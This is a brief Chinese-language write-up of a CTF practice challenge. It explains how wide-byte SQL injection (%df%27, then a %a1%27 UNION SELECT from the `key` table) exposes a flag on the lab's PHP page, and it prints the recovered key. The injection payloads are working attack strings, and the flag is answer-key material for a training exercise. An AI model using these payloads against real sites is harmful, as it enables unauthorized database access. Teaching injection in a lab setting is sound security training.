1. 程式人生 > >CTF練習平臺sql注入測試writeup

CTF練習平臺sql注入測試writeup

練習網址http://103.238.227.13:10083/

頁面截圖


由以上提示我們可以看出查詢key表,id=1的string欄位,為此我們可以從最基本的注入開始嘗試


發現並不報錯,想到了寬位元組注入,並且可以驗證一下:

http://103.238.227.13:10083/index.php
?id=%df%27

輸出結果如下


說明存在注入漏洞,我們可根據題的提示用寬位元組注入練習下,如果不懂寬位元組注入的可以看一下這個連結學習http://blog.csdn.net/helloweb2014/article/details/60757497

注入如下

http://103.238.227.13:10083/index.php


?id=-1%a1%27 union select 1,string from `key`%23

輸出結果如圖:


得到key為

54f3320dc261f313ba712eb3f13a1f6d